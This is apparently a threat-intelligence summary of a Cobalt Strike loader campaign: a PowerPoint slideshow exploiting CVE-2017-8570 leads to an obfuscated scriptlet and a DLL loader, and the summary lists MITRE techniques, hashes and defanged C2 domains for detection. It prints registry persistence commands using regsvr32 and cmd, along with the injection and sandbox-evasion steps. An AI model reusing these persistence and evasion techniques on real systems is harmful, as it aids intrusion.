Keypoints
- Initial vector: a PPSX PowerPoint slideshow uses a remote OLE relationship and the CVE-2017-8570 RELS exploit to load an obfuscated remote script.
- The remote scriptlet (widget_iframe…) is heavily obfuscated, deobfuscated to a JSE that runs via cscript.exe to persist, decode, and write the payload to disk.
- Payload dropped as C:UsersAppDataRoamingCiscoAnyConnectvpn.sessings and achieves persistence via HKCU Command Processor AutoRun (regsvr32 execution) and HKCU Run (cmd /Q /C whoami).
- The vpn.sessings DLL implements DllRegisterServer logic to decrypt and unpack a Cobalt Strike Beacon, then performs self-injection (OpenProcess, AllocateMemory, WriteProcessMemory, CreateRemoteThread).
- Loader anti-analysis includes terminating parent processes (anti-debug), CPUID VM checks, repeated NtDelayExecution stalls, attempted NTDLL unhooking, and intentionally obfuscated/bloat code and manual PE offsets to slow analysis.
- Cobalt Strike config contains a public key and C2 configuration; the Beacon communicates over HTTPS with petapixel[.]fun and targets injection into dllhost.exe.
- IOCs include domains weavesilk[.]space and petapixel[.]fun, IP 109.107.178[.]241, and SHA256 hashes for the PPSX, scriptlet, and vpn.sessings DLL.
MITRE Techniques
- [T1566] Phishing – Used a malicious PowerPoint slideshow exploiting RELS to fetch a remote script (‘PowerPoint signal-2023-12-20-160512.ppsx containing RELS exploit’)
- [T1059.007] Command and Scripting Interpreter: JavaScript – Executed an obfuscated JSE via cscript.exe to decode and drop the payload (‘widget_iframe.617766616773726468746672726a6834.html containing obfuscated JavaScript’)
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys – Achieved persistence via HKCU Run using ‘cmd /Q /C whoami’ (‘HKCUSoftwareMicrosoftWindowsCurrentVirsionRun: cmd /Q /C whoami’)
- [T1547] Event-Triggered Execution – Achieved persistence via Command Processor AutoRun invoking regsvr32 to load the DLL (‘HKCUSoftwareMicrosoftCommand ProcessorAutoRun: start regsvr32 /s C:vpn.sessings’)
- [T1218.010] Signed Binary Proxy Execution: Regsvr32 – Executed the DLL using regsvr32 to bypass direct execution detection (‘start regsvr32 /s C:vpn.sessings’)
- [T1055] Process Injection – Performed self-injection of the unpacked Beacon using OpenProcess/AllocateMemory/WriteProcessMemory/CreateRemoteThread (‘Performed a self-injection after unpacking the Cobalt Strike Beacon, using the classic CreateRemoteThread method’)
- [T1027.002] Software Packing – The loader unpacks/decrypts the Cobalt Strike payload using a derived key and standard decryption routine (‘Unpacked the Cobalt Beacon using CryptDecrypt’)
- [T1057] Process Discovery – Iterated running processes to locate and terminate its parent process as an anti-debugging measure (‘Iterated the running processes to terminate its parent for anti-debugging’)
- [T1497] Virtualization/Sandbox Evasion – Used NtDelayExecution stalls and repeated short sleeps to extend execution time and evade automated sandboxes (‘Performed NtDelayExecution to stall execution, possibly to evade automatic sandbox emulation by exploiting time constraints’)
- [T1573] Encrypted Channel – Beacon uses encrypted communications (HTTPS) to the C2 server for command and control (‘C&C communication using HTTPS on port 443’)
Indicators of Compromise
- [Domain] hosting / C2 – weavesilk[.]space (second-stage script host), petapixel[.]fun (Cobalt Strike C2)
- [IP] hosting real IP behind Cloudflare – 109.107.178[.]241
- [File name] dropped and loader – vpn.sessings (loader DLL), signal-2023-12-20-160512.ppsx (malicious PPSX)
- [SHA256] sample hashes – b0b762106c22e44f7acaa3177baabd64ea28990d16672e1f902b53f49b2027c4 (signal-2023-12-20-160512.ppsx), 976f57442452cd54cada011c565ada0c01f5b1460e31ee6cea330d210d3e8f50 (vpn.sessings), and 0bc0e9410f4a9703ff0b5af7ec9383a1cc929572ade09fbd2c69ed2ae1486939 (scriptlet)
The malicious chain begins with a PPSX that references a remote OLE object using the CVE-2017-8570 RELS technique to load an obfuscated JSE hosted on weavesilk[.]space. The scriptlet, executed by cscript.exe, decodes embedded data and writes a masqueraded DLL payload to C:UsersAppDataRoamingCiscoAnyConnectvpn.sessings, then establishes persistence by setting HKCUSoftwareMicrosoftCommand ProcessorAutoRun to run regsvr32 on the DLL and HKCUSoftwareMicrosoftWindowsCurrentVersionRun to execute a cmd-based trigger.
When invoked (via regsvr32), the DLL’s DllRegisterServer contains the main routine: it performs anti-analysis steps (terminating parent processes, CPUID VM checks, repeated NtDelayExecution stalls), attempts to unhook ntdll by reconstructing disk and memory copies and overwriting .text, and uses obfuscated/bloat code and manual PE offsets to slow reverse engineering. The loader derives a decryption key from embedded seeds, decrypts the Cobalt Strike Beacon blob, and performs in-memory self-injection (OpenProcess, VirtualAlloc/AllocateMemory, WriteProcessMemory, CreateRemoteThread, WaitForSingleObject) to execute the Beacon without writing the executable payload to disk.
The unpacked Beacon contains a configuration with a public key for encrypted communication and a C2 entry pointing to petapixel[.]fun (HTTPS). The overall procedure emphasizes fileless execution, sandbox/time-delay evasion, and API-hook bypassing to reduce detection and complicate analysis, while leaving identifiable artifacts (drop path, registry keys, domains, and SHA256 hashes) that can be used for detection and response.
Read more: https://www.deepinstinct.com/blog/uncorking-old-wine-zero-day-cobalt-strike-loader